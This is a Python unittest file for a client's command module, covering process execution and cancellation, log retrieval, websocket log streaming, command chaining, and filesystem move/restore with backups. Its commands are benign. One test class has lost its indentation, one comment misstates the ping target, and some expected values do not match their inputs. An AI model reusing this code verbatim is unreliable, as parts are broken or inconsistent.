class TestCommands(EventLoopTestCase):
    """Tests for the coroutines in client.command (execute, logging, chains).

    Fix applied throughout: the original compared ``os.name is 'nt'`` in four
    tests.  ``is`` on a string literal checks object identity, which only works
    by CPython interning accident and raises a SyntaxWarning on modern
    CPython; all occurrences now use ``==``.
    """

    def test_execution_nonexisting_directory(self):
        """A program path inside a non-existing directory yields the shell's error code."""
        # 'appplications' (sic) is misspelled on purpose so the path never exists.
        path = os.path.join(os.getcwd(), 'appplications', 'tee.py')
        if os.name == 'nt':
            return_value = '1'
        else:
            return_value = '127'
        self.assertEqual(
            return_value,
            self.loop.run_until_complete(
                client.command.execute(
                    random.choice(string.digits),
                    uuid4().hex, path, [])),
        )

    def test_execution_wrong_path_object(self):
        """A non-list arguments value raises ValueError."""
        self.assertRaises(
            ValueError,
            self.loop.run_until_complete,
            client.command.execute(
                random.choice(string.digits),
                uuid4().hex, "calcs.exe", "this is a arguments list"),
        )

    def test_execution_wrong_prog_object(self):
        """A non-string program path raises ValueError."""
        self.assertRaises(
            ValueError,
            self.loop.run_until_complete,
            client.command.execute(
                random.choice(string.digits),
                uuid4().hex, ["calcs.exe"], []),
        )

    def test_execution_wrong_arguments_elements(self):
        """Non-string elements inside the arguments list raise ValueError."""
        self.assertRaises(
            ValueError,
            self.loop.run_until_complete,
            client.command.execute(
                random.choice(string.digits),
                uuid4().hex, "calcs.exe", [1, 2, 34]),
        )

    def test_execution_echo_shell(self):
        """Running the platform shell's echo succeeds with exit status '0'."""
        if os.name == 'nt':
            prog = "C:\\Windows\\System32\\cmd.exe"
            args = ["/c", "ECHO %date%"]
        else:
            prog = "/bin/sh"
            args = ["-c", "echo $(date)"]
        self.assertEqual(
            '0',
            self.loop.run_until_complete(
                client.command.execute(
                    random.choice(string.digits),
                    uuid4().hex, prog, args)),
        )

    def test_online(self):
        """client.command.online() completes and returns None."""
        result = self.loop.run_until_complete(client.command.online())
        self.assertIsNone(result)

    def test_execution_directory(self):
        """A program is executed with its own directory as working directory.

        The script writes test.txt next to itself; paths contain spaces on
        purpose to exercise quoting.
        """
        path = join(getcwd(), 'applications')
        if os.name == 'nt':
            prog = join(path, 'folder with spaces', 'echo with spaces.bat')
        else:
            prog = join(path, 'folder with spaces', 'echo with spaces.sh')
        self.assertEqual('0',
                         self.loop.run_until_complete(
                             client.command.execute(
                                 random.choice(string.digits),
                                 uuid4().hex, prog, [])))
        self.assertTrue(isfile(join(path, 'folder with spaces', 'test.txt')))
        remove(join(path, 'folder with spaces', 'test.txt'))

    def test_cancel_execution_with_terminate(self):
        """Cancelling a running command terminates it (SIGTERM exit status)."""
        if os.name == 'nt':  # was `is 'nt'` — identity comparison bug
            prog = "C:\\Windows\\System32\\cmd.exe"
            args = ["/c", "notepad.exe"]
            return_code = '15'
        else:
            prog = "/bin/bash"
            args = ['-c', '"sleep 100"']
            return_code = '143'  # TODO why not -15 ???

        @asyncio.coroutine
        def create_and_cancel_task():
            task = self.loop.create_task(
                client.command.execute(
                    random.choice(string.digits),
                    uuid4().hex, prog, args))
            yield from asyncio.sleep(0.5)
            task.cancel()
            print("canceled task")
            result = yield from task
            return result

        res = self.loop.run_until_complete(create_and_cancel_task())
        self.assertEqual(return_code, res)

    def test_cancel_execution_with_kill(self):
        """A process ignoring SIGTERM is killed on cancel (SIGKILL exit status)."""
        prog = sys.executable
        args = [join(getcwd(), 'applications', 'kill_me.py')]
        if os.name == 'nt':  # was `is 'nt'` — identity comparison bug
            return_code = '15'
        else:
            return_code = '137'  # TODO why not -9 ???

        @asyncio.coroutine
        def create_and_cancel_task():
            task = self.loop.create_task(
                client.command.execute(
                    random.choice(string.digits),
                    uuid4().hex, prog, args))
            yield from asyncio.sleep(0.5)
            task.cancel()
            print("canceled task")
            result = yield from task
            return result

        res = self.loop.run_until_complete(create_and_cancel_task())
        self.assertEqual(return_code, res)

    def test_get_log(self):
        """get_log returns the captured output and the uuid of an execution."""
        uuid = uuid4().hex
        message = ''.join([
            random.choice(string.ascii_letters + string.digits)
            for n in range(32)
        ])
        self.assertEqual('0',
                         self.loop.run_until_complete(
                             client.command.execute(
                                 random.choice(string.digits), uuid, 'echo',
                                 [message])))
        res = self.loop.run_until_complete(client.command.get_log(uuid))
        if os.name == 'nt':
            # cmd echoes the command line itself before its output
            self.assertIn(
                'echo ' + message + ' \r\n ' + message + '\r\n',
                res['log'],
            )
        else:
            self.assertIn(
                message + '\n',
                res['log'],
            )
        self.assertEqual(
            uuid,
            res['uuid'],
        )

    def test_get_log_unknown_uuid(self):
        """get_log raises KeyError for an unknown uuid."""
        self.assertRaises(KeyError, self.loop.run_until_complete,
                          client.command.get_log('abcdefg'))

    def test_websocket_logging(self):
        """Log lines of a running command are streamed over a websocket."""
        if os.name == 'nt':  # was `is 'nt'` — identity comparison bug
            prog = 'cmd'

            def sleep_hack(seconds):
                # Windows has no `sleep`; pinging localhost n times waits ~n seconds.
                return 'ping 8.8.8.8 -n ' + seconds + ' >nul'

            args = [
                '/c',
                sleep_hack('3') + '& echo 0&' + sleep_hack('1') + ' & echo 1'
            ]
            expected_log = b'0\r\n1\r\n'
        else:
            prog = '/bin/bash'
            args = ['-c', '"sleep 3; echo 0; sleep 1; echo 1"']
            expected_log = b'0\n1\n'
        uuid = uuid4().hex

        @asyncio.coroutine
        def enable_logging():
            yield from asyncio.sleep(1)
            yield from client.command.enable_logging(uuid)

        @asyncio.coroutine
        def start_execution():
            yield from client.command.execute(
                random.choice(string.digits), uuid, prog, args)

        @asyncio.coroutine
        def start_server():
            finished = asyncio.Future()

            @asyncio.coroutine
            def websocket_handler(websocket, path):
                self.assertEqual('/logs', path)
                # receive log from file
                json = yield from websocket.recv()
                log = Status.from_json(json).payload['log'].encode()
                # ack
                yield from websocket.send('')
                # receive dynamic log; an empty message marks the end
                while True:
                    json = yield from websocket.recv()
                    # ack
                    msg = Status.from_json(json).payload['log'].encode()
                    log += msg
                    if msg == b'':
                        break
                    else:
                        yield from websocket.send('')
                self.assertIn(expected_log, log)
                print('finished server')
                finished.set_result(None)

            server_handle = yield from websockets.serve(
                websocket_handler, host='127.0.0.1', port=8750)
            yield from finished
            server_handle.close()
            yield from server_handle.wait_closed()

        @asyncio.coroutine
        def wait_for_all():
            tasks = {
                start_server(),
                start_execution(),
                enable_logging(),
            }
            yield from asyncio.wait(tasks, return_when=asyncio.ALL_COMPLETED)
            yield from client.command.disable_logging(uuid)

        LOGGER.url = 'ws://localhost:8750/logs'
        self.loop.run_until_complete(wait_for_all())

    def test_websocket_logging_early_disable(self):
        """Disabling logging mid-run stops the stream after the first line."""
        if os.name == 'nt':  # was `is 'nt'` — identity comparison bug
            prog = 'cmd'

            def sleep_hack(seconds):
                # Windows has no `sleep`; pinging localhost n times waits ~n seconds.
                return 'ping 8.8.8.8 -n ' + seconds + ' >nul'

            args = [
                '/c',
                sleep_hack('3') + '& echo 0&' + sleep_hack('3') + ' & echo 1'
            ]
            expected_log = b'0\r\n'
        else:
            prog = '/bin/bash'
            args = ['-c', '"sleep 3; echo 0; sleep 3; echo 1"']
            expected_log = b'0\n'
        uuid = uuid4().hex

        @asyncio.coroutine
        def enable_logging():
            yield from asyncio.sleep(1)
            yield from client.command.enable_logging(uuid)

        @asyncio.coroutine
        def disable_logging():
            yield from asyncio.sleep(4)
            yield from client.command.disable_logging(uuid)

        @asyncio.coroutine
        def start_execution():
            yield from client.command.execute(
                random.choice(string.digits), uuid, prog, args)

        @asyncio.coroutine
        def start_server():
            finished = asyncio.Future()

            @asyncio.coroutine
            def websocket_handler(websocket, path):
                self.assertEqual('/logs', path)
                # receive log from file
                json = yield from websocket.recv()
                log = Status.from_json(json).payload['log'].encode()
                # ack
                yield from websocket.send('')
                # receive dynamic log; the client may simply close the connection
                while True:
                    try:
                        json = yield from websocket.recv()
                        # ack
                        yield from websocket.send('')
                        msg = Status.from_json(json).payload['log'].encode()
                        if msg == b'':
                            break
                        log += msg
                    except websockets.exceptions.ConnectionClosed:
                        break
                self.assertIn(expected_log, log)
                print('finished server')
                finished.set_result(None)

            server_handle = yield from websockets.serve(
                websocket_handler, host='127.0.0.1', port=8750)
            yield from finished
            server_handle.close()
            yield from server_handle.wait_closed()

        @asyncio.coroutine
        def wait_for_all():
            tasks = {
                start_server(),
                start_execution(),
                enable_logging(),
                disable_logging(),
            }
            yield from asyncio.wait(tasks, return_when=asyncio.ALL_COMPLETED)

        LOGGER.url = 'ws://localhost:8750/logs'
        self.loop.run_until_complete(wait_for_all())

    def test_chain_command_none(self):
        """A chain entry with a None method yields an empty result list."""
        result = self.loop.run_until_complete(
            client.command.chain_execution(commands=[{
                'method': None,
                'uuid': None,
                'arguments': [],
            }]))
        self.assertEqual(result, [])

    def test_chain_command_success(self):
        """A valid chained execute reports an ID_OK status with result '0'."""
        if os.name == 'nt':
            prog = "C:\\Windows\\System32\\cmd.exe"
            args = ["/c", "ECHO %date%"]
        else:
            prog = "/bin/sh"
            args = ["-c", "echo $(date)"]
        result = self.loop.run_until_complete(
            client.command.chain_execution(commands=[{
                'method': 'execute',
                'uuid': 'thisisunique',
                'arguments': {
                    'pid': random.choice(string.digits),
                    'own_uuid': uuid4().hex,
                    'path': prog,
                    'arguments': args
                },
            }]))
        response = Status(
            Status.ID_OK,
            {
                'method': 'execute',
                'result': '0',
            },
            'thisisunique',
        )
        self.assertEqual(Status(**result[0]), response)

    def test_chain_command_one_failed(self):
        """A failing chain entry aborts the rest with an explanatory error."""
        if os.name == 'nt':
            prog = "C:\\Windows\\System32\\cmd.exe"
            args = ["/c", "ECHO %date%"]
        else:
            prog = "/bin/sh"
            args = ["-c", "echo $(date)"]
        # First entry is missing the mandatory 'arguments' key; the second is
        # valid but must be skipped because the first one failed.
        result = self.loop.run_until_complete(
            client.command.chain_execution(commands=[{
                'method': 'execute',
                'uuid': 0,
                'arguments': {
                    'pid': 1,
                    'own_uuid': 0,
                    'path': prog,
                },
            }, {
                'method': 'execute',
                'uuid': 1,
                'arguments': {
                    'pid': 1,
                    'own_uuid': 1,
                    'path': prog,
                    'arguments': args
                },
            }]))
        response1 = Status(
            Status.ID_ERR,
            {
                'method':
                'execute',
                'result':
                "execute() missing 1 required positional argument: 'arguments'",
            },
            'uniqueidforfirst',
        )
        response2 = Status(
            Status.ID_ERR,
            {
                'method':
                'execute',
                'result':
                'Could not execute because earlier command was not successful.',
            },
            'uniqueidforsecond',
        )
        self.assertEqual(Status(**result[0]), response1)
        self.assertEqual(Status(**result[1]), response2)
class FileCommandFilesTests(FileSystemTestCase):
    """Tests for client.command.filesystem_move / filesystem_restore on single files.

    Observed contract (from the assertions below): moving a file to a
    destination creates a copy there, keeps the source, and — when the
    destination already existed — preserves the old destination under
    ``<destination> + backup_ending``.  ``filesystem_restore`` undoes the move
    and brings back the backup if one exists.
    """

    @classmethod
    def setUpClass(cls):
        # backup_ending is the suffix appended to a displaced destination file.
        super().setUpClass()
        cls.backup_ending = "_BACK"

    def test_filesystem_move_destination_exists(self):
        """Moving onto an existing file keeps the source and backs up the old destination."""
        (source, _, _) = self.provideFile("test.abc")
        (destination, _, _) = self.provideFile("test.abc.link")
        backup = destination + self.backup_ending
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
        self.loop.run_until_complete(
            client.command.filesystem_move(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
            ))
        self.assertFilesArePresent(destination, backup, source)

    def test_filesystem_move_destination_not_exists(self):
        """Moving to a fresh destination creates it without producing a backup."""
        (source, _, _) = self.provideFile("test.abc")
        destination = self.joinPath("test.abc.link")
        backup = destination + self.backup_ending
        self.assertFilesArePresent(source)
        self.assertFilesAreNotPresent(backup, destination)
        self.loop.run_until_complete(
            client.command.filesystem_move(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
            ))
        self.assertFilesArePresent(destination, source)
        self.assertFilesAreNotPresent(backup)

    def test_filesystem_move_source_not_exists(self):
        """A missing source raises FileNotFoundError and leaves the destination alone."""
        source = self.joinPath("test.abc")
        (destination, _, _) = self.provideFile("test.abc.link")
        self.assertFilesArePresent(destination)
        self.assertFilesAreNotPresent(source)
        self.assertRaises(
            FileNotFoundError,
            self.loop.run_until_complete,
            client.command.filesystem_move(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
            ),
        )
        self.assertFilesArePresent(destination)
        self.assertFilesAreNotPresent(source)

    def test_filesystem_move_backup_exists(self):
        """An already-present backup file makes the move fail with FileExistsError."""
        (source, _, _) = self.provideFile("test.abc")
        (destination, _, _) = self.provideFile("test.abc.link")
        (backup, _, _) = self.provideFile("test.abc.link" + self.backup_ending)
        self.assertFilesArePresent(source, destination, backup)
        self.assertRaises(
            FileExistsError,
            self.loop.run_until_complete,
            client.command.filesystem_move(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
            ),
        )
        self.assertFilesArePresent(source, destination, backup)

    def test_filesystem_move_destination_folder_success(self):
        """Moving into a directory places the file inside it under its own name."""
        (source, _, _) = self.provideFile("test.abc")
        destination_path = self.provideDirectory("this_is_my_folder")
        destination = self.joinPath("this_is_my_folder/test.abc")
        backup = destination + self.backup_ending
        self.assertFilesArePresent(source)
        self.assertFilesAreNotPresent(backup, destination)
        self.assertDirsArePresent(destination_path)
        self.loop.run_until_complete(
            client.command.filesystem_move(
                source,
                "file",
                destination_path,
                "dir",
                self.backup_ending,
            ))
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
        self.assertDirsArePresent(destination_path)

    def test_filesystem_move_destination_folder_destination_exist(self):
        """Moving into a directory that already holds the file creates a backup there."""
        (source, _, _) = self.provideFile("test.abc")
        destination_path = self.provideDirectory("this_is_my_folder")
        (destination, _, _) = self.provideFile("this_is_my_folder/test.abc")
        backup = destination + self.backup_ending
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
        self.assertDirsArePresent(destination_path)
        self.loop.run_until_complete(
            client.command.filesystem_move(
                source,
                "file",
                destination_path,
                "dir",
                self.backup_ending,
            ))
        self.assertFilesArePresent(source, destination, backup)
        self.assertDirsArePresent(destination_path)

    def test_filesystem_move_destination_folder_backup_exist(self):
        """A pre-existing backup inside the destination directory aborts the move."""
        (source, _, _) = self.provideFile("test.abc")
        destination_path = self.provideDirectory("this_is_my_folder")
        (destination, _, _) = self.provideFile("this_is_my_folder/test.abc")
        (backup, _, _) = self.provideFile(
            "this_is_my_folder/test.abc" + self.backup_ending)
        self.assertFilesArePresent(source, destination, backup)
        self.assertDirsArePresent(destination_path)
        self.assertRaises(
            FileExistsError,
            self.loop.run_until_complete,
            client.command.filesystem_move(
                source,
                "file",
                destination_path,
                "dir",
                self.backup_ending,
            ),
        )
        self.assertFilesArePresent(source, destination, backup)
        self.assertDirsArePresent(destination_path)

    def test_filesystem_restore_no_backup(self):
        """Restoring a move without a backup simply removes the destination."""
        (source, _, hash_source) = self.provideFile("test.abc")
        destination = self.joinPath("test.abc.link")
        backup = destination + self.backup_ending
        self.assertFilesArePresent(source)
        self.assertFilesAreNotPresent(destination, backup)
        self.loop.run_until_complete(
            client.command.filesystem_move(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
            ))
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
        self.loop.run_until_complete(
            client.command.filesystem_restore(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
                hash_source,
            ))
        self.assertFilesArePresent(source)
        self.assertFilesAreNotPresent(destination, backup)

    def test_filesystem_restore_no_backup_destination_dir(self):
        """Restoring a directory-targeted move brings back the displaced file."""
        (source, _, hash_source) = self.provideFile("test.abc")
        destination_path = self.provideDirectory("this_is_my_folder")
        (destination, _, _) = self.provideFile("this_is_my_folder/test.abc")
        backup = self.joinPath(
            "this_is_my_folder/test.abc" + self.backup_ending)
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
        self.assertDirsArePresent(destination_path)
        self.loop.run_until_complete(
            client.command.filesystem_move(
                source,
                "file",
                destination_path,
                "dir",
                self.backup_ending,
            ))
        self.assertFilesArePresent(source, destination, backup)
        self.assertDirsArePresent(destination_path)
        self.loop.run_until_complete(
            client.command.filesystem_restore(
                source,
                "file",
                destination_path,
                "dir",
                self.backup_ending,
                hash_source,
            ))
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
        self.assertDirsArePresent(destination_path)

    def test_filesystem_restore_with_backup(self):
        """After restore, the destination holds the backed-up original content again."""
        (source, data_source, hash_source) = self.provideFile("test.abc")
        destination_path = self.provideDirectory("this_is_my_folder")
        (
            destination,
            data_destination,
            _,
        ) = self.provideFile("this_is_my_folder/test.abc")
        backup = self.joinPath(
            "this_is_my_folder/test.abc" + self.backup_ending)
        self.assertFilesArePresent(source, destination)
        self.assertDirsArePresent(destination_path)
        self.loop.run_until_complete(
            client.command.filesystem_move(
                source,
                "file",
                destination_path,
                "dir",
                self.backup_ending,
            ))
        self.assertFilesArePresent(source, destination, backup)
        # after the move the destination carries the source's content
        with open(destination, 'r') as clone:
            self.assertEqual(clone.read(), data_source)
        self.assertDirsArePresent(destination_path)
        self.loop.run_until_complete(
            client.command.filesystem_restore(
                source,
                "file",
                destination_path,
                "dir",
                self.backup_ending,
                hash_source,
            ))
        self.assertFilesArePresent(source, destination)
        # after the restore the original destination content is back
        with open(destination, 'r') as clone:
            self.assertEqual(clone.read(), data_destination)
        self.assertDirsArePresent(destination_path)

    def test_filesystem_restore_no_destination_with_backup(self):
        """With no destination, restore promotes the backup to the destination."""
        (source, _, hash_source) = self.provideFile("test.abc")
        destination = self.joinPath("test.abc.link")
        (
            backup,
            data_backup,
            _,
        ) = self.provideFile("test.abc.link" + self.backup_ending)
        self.assertFilesArePresent(source, backup)
        self.assertFilesAreNotPresent(destination)
        self.loop.run_until_complete(
            client.command.filesystem_restore(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
                hash_source,
            ))
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
        with open(destination, 'r') as clone:
            self.assertEqual(clone.read(), data_backup)

    def test_filesystem_restore_no_destination(self):
        """Restore with neither destination nor backup is a harmless no-op."""
        (source, _, hash_source) = self.provideFile("test.abc")
        destination = self.joinPath("test.abc.link")
        backup = destination + self.backup_ending
        self.assertFilesArePresent(source)
        self.assertFilesAreNotPresent(destination, backup)
        self.loop.run_until_complete(
            client.command.filesystem_restore(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
                hash_source,
            ))
        self.assertFilesArePresent(source)
        self.assertFilesAreNotPresent(destination, backup)

    # NOTE(review): the following test is intentionally disabled by being
    # wrapped in a string literal; consider @unittest.skip instead so the
    # intent is explicit and the code is still parsed.
    """
    def test_filesystem_restore_replaced(self):
        (source, _, hash_source) = self.provideFile("test.abc")
        (destination, _, _) = self.provideFile("test.abc.link")
        backup = destination + self.backup_ending
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
        self.assertRaisesRegex(
            ValueError,
            "file .* was changed while it was replaced",
            self.loop.run_until_complete,
            client.command.filesystem_restore(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
                hash_source,
            ),
        )
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
    """

    def test_filesystem_restore_modified(self):
        """A destination modified after the move is still removed by restore."""
        (source, _, hash_source) = self.provideFile("test.abc")
        destination = self.joinPath("test.abc.link")
        backup = destination + self.backup_ending
        self.assertFilesArePresent(source)
        self.assertFilesAreNotPresent(backup, destination)
        self.loop.run_until_complete(
            client.command.filesystem_move(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
            ))
        self.assertFilesArePresent(source, destination)
        self.assertFilesAreNotPresent(backup)
        # overwrite the moved copy so its hash no longer matches hash_source
        with open(destination, 'w+') as clone:
            clone.write("test")
        self.loop.run_until_complete(
            client.command.filesystem_restore(
                source,
                "file",
                destination,
                "file",
                self.backup_ending,
                hash_source,
            ))
        self.assertFilesArePresent(source)
        self.assertFilesAreNotPresent(backup, destination)
class FileCommandDirsTests(FileSystemTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.backup_ending = "_BACK"
def test_filesystem_move_destination_exists(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
(destination, _, _) = self.provideFilledDirectory("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
))
self.assertDirsArePresent(destination, backup, source)
def test_filesystem_move_destination_not_exists(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(backup, destination)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
))
self.assertDirsArePresent(destination, source)
self.assertDirsAreNotPresent(backup)
def test_filesystem_move_source_not_exists(self):
source = self.joinPath("test.abc")
(destination, _, _) = self.provideFilledDirectory("test.abc.link")
self.assertDirsArePresent(destination)
self.assertDirsAreNotPresent(source)
self.assertRaises(
FileNotFoundError,
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
),
)
self.assertDirsArePresent(destination)
self.assertDirsAreNotPresent(source)
def test_filesystem_move_backup_exists(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
(destination, _, _) = self.provideFilledDirectory("test.abc.link")
(backup, _,
_) = self.provideFilledDirectory("test.abc.link" + self.backup_ending)
self.assertDirsArePresent(source, destination, backup)
self.assertRaises(
FileExistsError,
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
),
)
self.assertDirsArePresent(source, destination, backup)
def test_filesystem_move_destination_folder_success(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
destination = self.joinPath("this_is_my_folder/test.abc")
backup = destination + self.backup_ending
self.assertDirsAreNotPresent(backup, destination)
self.assertDirsArePresent(destination_path, source)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
))
self.assertDirsAreNotPresent(backup)
self.assertDirsArePresent(destination_path, source, destination)
def test_filesystem_move_destination_folder_destination_exist(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(destination, _,
_) = self.provideFilledDirectory("this_is_my_folder/test.abc")
backup = destination + self.backup_ending
self.assertDirsAreNotPresent(backup)
self.assertDirsArePresent(destination_path, source, destination)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
))
self.assertDirsArePresent(source, destination, backup,
destination_path)
def test_filesystem_move_destination_folder_backup_exist(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(destination, _,
_) = self.provideFilledDirectory("this_is_my_folder/test.abc")
(backup, _, _) = self.provideFilledDirectory(
"this_is_my_folder/test.abc" + self.backup_ending)
self.assertDirsArePresent(source, destination, backup,
destination_path)
self.assertRaises(
FileExistsError,
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
),
)
self.assertDirsArePresent(source, destination, backup,
destination_path)
def test_filesystem_restore_no_backup(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(destination, backup)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
))
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(destination, backup)
def test_filesystem_restore_no_backup_destination_dir(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(destination, _,
_) = self.provideFilledDirectory("this_is_my_folder/test.abc")
backup = self.joinPath(
"this_is_my_folder/test.abc" + self.backup_ending)
self.assertDirsArePresent(source, destination, destination_path)
self.assertDirsAreNotPresent(backup)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
))
self.assertDirsArePresent(source, destination, backup,
destination_path)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source, destination, destination_path)
self.assertDirsAreNotPresent(backup)
def test_filesystem_restore_with_backup(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(
destination,
files_destination,
_,
) = self.provideFilledDirectory("this_is_my_folder/test.abc")
backup = self.joinPath(
"this_is_my_folder/test.abc" + self.backup_ending)
self.assertDirsArePresent(source, destination, destination_path)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
))
self.assertDirsArePresent(source, destination, backup)
self.assertDirsArePresent(destination_path)
self.assertDirsEqual(destination, source)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source, destination, destination_path)
self.assertDirEqual(destination,
list(map(
lambda f: f[2],
files_destination,
)))
def test_filesystem_restore_no_destination_with_backup(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
(
backup,
files_backup,
_,
) = self.provideFilledDirectory("test.abc.link" + self.backup_ending)
self.assertDirsArePresent(source, backup)
self.assertDirsAreNotPresent(destination)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
self.assertDirEqual(destination, list(
map(lambda f: f[2], files_backup)))
def test_filesystem_restore_no_destination(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(destination, backup)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(destination, backup)
"""
def test_filesystem_restore_replaced(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
(destination, _, _) = self.provideFilledDirectory("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
self.assertRaisesRegex(
ValueError,
"directory .* was changed while it was replaced",
self.loop.run_until_complete,
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
),
)
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
"""
def test_filesystem_restore_modified(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(backup, destination)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
))
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
# create a new file in source and destination
new_file_name = "12345678901234567890123456"
(new_file, _, _) = self.provideFile(
os.path.join(destination, new_file_name))
shutil.copy2(new_file,
self.joinPath(os.path.join(source, new_file_name)))
self.assertDirsEqual(source, destination)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(backup, destination)
class FileCommandGenericTests(FileSystemTestCase):
    """Shared error-path tests for the hash helpers and filesystem commands."""

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # Suffix appended to paths when a backup copy is created.
        cls.backup_ending = "_BACK"

    def test_hash_file_not_found(self):
        """hash_file must reject a path that points at a directory."""
        self.provideDirectory("test")
        with self.assertRaisesRegex(ValueError,
                                    "The given path .* is not a file"):
            client.shorthand.hash_file(self.joinPath("test"))

    def test_hash_dir_not_found(self):
        """hash_directory must reject a path that points at a file."""
        self.provideFile("test")
        with self.assertRaisesRegex(ValueError,
                                    "The given path .* is not a directory"):
            client.shorthand.hash_directory(self.joinPath("test"))

    def test_filesystem_move_source_not_exists_wrong_type_dir(self):
        """Moving a file while claiming source type 'dir' fails cleanly."""
        (src, _, _) = self.provideFile("test.abc")
        dst = self.joinPath("test.abc.link")
        self.assertFilesArePresent(src)
        self.assertFilesAreNotPresent(dst)
        with self.assertRaisesRegex(ValueError,
                                    "source path .* is not a directory"):
            self.loop.run_until_complete(client.command.filesystem_move(
                src, "dir", dst, "file", self.backup_ending))
        # Nothing was moved.
        self.assertFilesArePresent(src)
        self.assertFilesAreNotPresent(dst)

    def test_filesystem_move_source_not_exists_wrong_type_file(self):
        """Moving a directory while claiming source type 'file' fails cleanly."""
        src = self.provideDirectory("test.abc")
        dst = self.joinPath("test.abc.link")
        self.assertDirsArePresent(src)
        self.assertFilesAreNotPresent(dst)
        with self.assertRaisesRegex(ValueError,
                                    "source path .* is not a file"):
            self.loop.run_until_complete(client.command.filesystem_move(
                src, "file", dst, "file", self.backup_ending))
        self.assertDirsArePresent(src)
        self.assertFilesAreNotPresent(dst)

    def test_filesystem_wrong_source_type_object(self):
        """An unknown source_type value is rejected by filesystem_restore."""
        with self.assertRaisesRegex(ValueError, "source_type"):
            self.loop.run_until_complete(client.command.filesystem_restore(
